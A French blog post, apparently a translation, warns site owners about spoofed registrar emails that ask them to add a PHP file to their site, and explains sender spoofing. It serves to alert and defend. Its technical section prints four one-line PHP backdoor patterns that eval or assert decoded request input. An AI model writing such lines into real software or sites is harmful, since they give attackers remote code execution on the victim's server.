Ne pas faire confiance à ces e-mails de confirmation de domaine faux
Si vous recevez une lettre de tout type demandant de créer, télécharger ou installer du code PHP sur votre site web, vous devez l'ignorer
English version: Do not trust those fake domain confirmation emails
Récemment, certains de mes clients ont reçu des courriers électroniques étranges de la part de leurs bureaux d'enregistrement de domaines. Ces lettres contiennent une demande de domaine de confirmation propre. J'ai vérifié l'une de ces lettres et l'ai rapidement identifiée comme une lettre frauduleuse . Toutes les lettres ont un motif identique et une demande pour créer un fichier PHP dans le dossier racine d'un site Web avec un nom spécifique et le contenu donné. Il va sans dire que le contenu suggéré pour ce fichier PHP contient un code malveillant appelé code de porte dérobée. Ce type de code permet à l'attaquant d'exécuter toute action de son choix sur le site Web d'une victime.
Si vous recevez une lettre de tout type demandant de créer, télécharger ou installer du code PHP sur votre site Web, vous devez l'ignorer. Aucune exception. Même si la lettre vient du président ou de ta mère.
Les lettres frauduleuses semblent légitimes en raison de légitimes adresses e-mail . Mais c'est un spoofing email. Vous ne vous attendez pas à recevoir un faux courriel de vos amis ou de votre registraire de domaine. Droite? Non! Toute lettre électronique peut contenir n’importe quelle adresse électronique De. La grande majorité des serveurs de messagerie et des clients de messagerie ne vérifient ni ne vérifient l'adresse de l'expéditeur. Donc, vous le voyez comme un pirate informatique. Vous ne devez pas faire confiance aux courriels que vous avez reçus d'expéditeurs connus si la lettre contient une demande d'action suspecte telle que l'installation de code sur votre site Web ou votre application sur votre ordinateur.
Détails techniques
Les faux emails contiennent généralement certaines des lignes PHP suivantes.
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
Pour info: base64_decode, eval et assert sont des marqueurs bien connus du code PHP suspect ou malveillant.
Voir aussi: Plugin Inspector révèle des problèmes de sécurité avec d'autres plugins